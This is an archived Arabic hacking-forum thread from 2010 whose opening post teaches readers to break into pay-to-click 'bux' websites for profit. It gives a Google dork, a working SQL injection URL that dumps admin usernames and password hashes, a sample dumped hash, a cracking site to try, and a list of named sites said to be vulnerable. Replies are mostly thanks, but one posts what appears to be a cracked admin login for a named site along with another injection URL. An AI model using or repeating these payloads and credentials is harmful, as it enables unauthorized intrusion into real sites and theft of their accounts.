:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   شرح مبسط لثغرة في مواقع ربح الاموال (اخترق و اربح بدون حدود) لوول (http://www.vbspiders.com/vb/t26148.html)

Zero 03-24-2010 03:15 AM

شرح مبسط لثغرة في مواقع ربح الاموال (اخترق و اربح بدون حدود) لوول
 
[align=center]بسم الله الرحمن الرحيم
الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين

لابد انك من قرائتك للعنوان عرفت عن مادا سنتحدت ادن بدون اطالة ندخل للموضوع

ندهب الى موقع البحت قوقل

www.google.co.ma

ناخد الدورك التالي

كود PHP:

inurl:"main_forum.php?cat=" 

و نحطه في مكان البحث

نلاحض المواقع الكتيرة وكلها تنتهي ب bux دا دليل على انها مواقع ربح

ناخد موقع من النتائج
انا اخترت موقع Alexaclick و نضيف ليه الاستغلال
ليصبح هكدا

كود PHP:

http://www.alexaclix.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat%28aId,0x3a,aUsername,0x3a,apassword%29,3,4,5,6,7+FROM+admins-- 

الاستغلال

كود PHP:

forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins-- 

فيعطينا النتيجة التالية
الي هي الباس و ايزر

كود PHP:

admin:d6ae89521827cb719f8cf42cdf6e79e0f26a01e3 

بس الباس هنا مشفر

لدي الحل

موقع مضمون

www.passcracking.com

ندخل للموقع دا ونضع الشفرة في المكان المخصص
ونضغط على DoIT

و نشوف التيجة ان شاء الله خير

كدا انتهينا من الشرح

و الان بعض المواقع المصابة

كود PHP:

http://www.alexaclix.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat%28aId,0x3a,aUsername,0x3a,apassword%29,3,4,5,6,7+FROM+admins--

gen3bux.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--  

bpbux.info/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins-- 

[/align]

synyster-hacker 03-24-2010 04:07 AM

موفق بإذن الله ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

Zero 03-24-2010 04:18 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة synyster-hacker (المشاركة 115079)
موفق بإذن الله ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

مشكوررررر

Dr.NaNo 03-24-2010 04:20 AM

يعطيك العافيه ياغالي



تحياتي لك

D-GhosT s3cur!Ty-Z 03-24-2010 04:48 AM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

KaLa$nikoV 03-28-2010 12:44 AM

يسلمو ع الطريقه

ربنا يسلم ايدك

KaLa$nikoV 03-28-2010 12:44 AM

يسلمو ع الطريقه

ربنا يسلم ايدك

Zero 03-28-2010 01:39 PM

[align=center]مشكورين اخوة على الردود[/align]

SoLiTair4Ever 03-28-2010 04:19 PM

مشكووووووور على الطريقة لكن موقع فك التشفير لا يعمل

SnIpEr-Ma 05-13-2010 12:53 AM

[align=center]thanks my friends


look at this


http://letusserveubux.com

admin--
bartooniusz

pass--love11

thanks you too men
[/align]

SnIpEr-Ma 05-13-2010 12:54 AM

to members

http://viewbux.com/forum/main_forum....+FROM+admins--

SnIpEr-Ma 05-13-2010 01:14 AM

[align=center]Peace be upon you my brother way possible profit after income accounts

Light could be explained Ada
[/align]

khamed tabet 05-13-2010 11:06 PM

ثغرة جيدا شكرااااا لك موضوع يستاهل التثبيت

to.be.frindes 05-15-2010 02:24 PM

المشكل اخي في فك التشفير .......لانه يصعب ايجادها لان همش فقط md5 .
والباقي صعب ولم اجد حل لفكه.
شـكــ وبارك الله فيك ـــرا لك

DaRk DrEaM 05-15-2010 02:44 PM

مــــــــــــــــــتتشكور يا غالي واصل أبداعك


الساعة الآن 01:02 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0